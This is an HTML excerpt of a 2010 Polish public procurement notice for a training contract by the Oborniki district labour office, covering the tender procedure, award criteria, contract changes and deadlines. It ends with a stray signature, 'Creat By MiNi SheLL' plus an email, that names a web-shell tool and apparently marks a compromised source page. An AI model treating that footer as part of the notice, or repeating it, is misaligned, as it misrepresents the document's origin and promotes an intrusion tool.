<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie w przeprowadzonych w okresie ostatnich 3 lat przed upływem składania ofert szkoleń - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zawarta umowa może zostać zmieniona, jeśli konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne lub neutralne dla zamawiającego. W szczególności zmiany te mogą dotyczyć terminu wykonania umowy, ilości osób szkolonych, w tym na poszczególne części zamówienia, nazwy lub siedziby Wykonawcy lub nieistotnych warunków umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.obornikiwlkp.ibip.pl/public<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Obornikach
ul. Sądowa 5
64 - 600 Oborniki
I piętro pok. 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2010 godzina 11:00, miejsce: Powiatowy Urząd Pracy w Obornikach
ul. Sądowa 5
64 - 600 Oborniki
I piętro pok. 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 13.06.2010.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com